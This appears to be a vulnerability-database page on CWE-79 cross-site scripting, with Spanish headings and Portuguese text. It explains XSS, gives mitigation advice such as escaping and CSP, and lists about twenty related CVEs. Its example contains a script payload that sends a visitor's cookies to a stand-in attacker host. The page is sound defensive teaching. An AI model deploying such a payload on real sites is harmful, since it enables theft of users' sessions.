Fallos del tipo CWE-79

28.519 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2020-15138HIGHCross-Site Scripting in PrismEPSS 2.0%CVE-2011-2920MEDIUMSpacewalk: spacewalk: cross-site scripting vulnerability allows arbitrary web script execution.EPSS 2.0%CVE-2022-0208—MapPress Maps for WordPress < 2.73.4 - Reflected Cross-Site scriptingEPSS 2.0%CVE-2018-0199—A vulnerability in Cisco Jabber Client Framework (JCF) could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSEPSS 2.0%CVE-2020-4041HIGHThe filename of uploaded files vulnerable to stored XSS in Bolt CMSEPSS 2.0%CVE-2007-4039CRITICALArgument injection vulnerability involving Mozilla, when certain URIs are registered, allows remote attackers to conduct cross-browser scripEPSS 2.0%CVE-2021-25055—FeedWordPress < 2022.0123 - Reflected Cross-Site Scripting (XSS)EPSS 2.0%CVE-2018-0357—A vulnerability in the web framework of Cisco WebEx could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) EPSS 2.0%CVE-2019-0558MEDIUMA cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web requesEPSS 2.0%CVE-2023-29247—Stored XSS on Apache AirflowEPSS 2.0%CVE-2023-36891HIGHMicrosoft SharePoint Server Spoofing VulnerabilityEPSS 2.0%CVE-2023-36892HIGHMicrosoft SharePoint Server Spoofing VulnerabilityEPSS 2.0%CVE-2021-24342—JNews < 8.0.6 - Reflected Cross-Site Scripting (XSS)EPSS 2.0%CVE-2021-24364—Jannah < 5.4.4 - Reflected Cross-Site Scripting (XSS)EPSS 2.0%CVE-2022-1231CRITICALXSS via Embedded SVG in SVG Diagram Format in plantuml/plantumlEPSS 2.0%CVE-2022-1916—Active Products Tables for WooCommerce < 1.0.5 - Reflected Cross-Site-ScriptingEPSS 1.9%CVE-2022-0271—LearnPress < 4.1.6 - Reflected Cross-Site ScriptingEPSS 1.9%CVE-2022-1756—Newsletter < 7.4.5 - Reflected Cross-Site ScriptingEPSS 1.9%CVE-2021-24987—Super Socializer < 7.13.30 - Reflected Cross-Site ScriptingEPSS 1.9%CVE-2020-26218HIGHHTML Injection in touchbase.aiEPSS 1.9%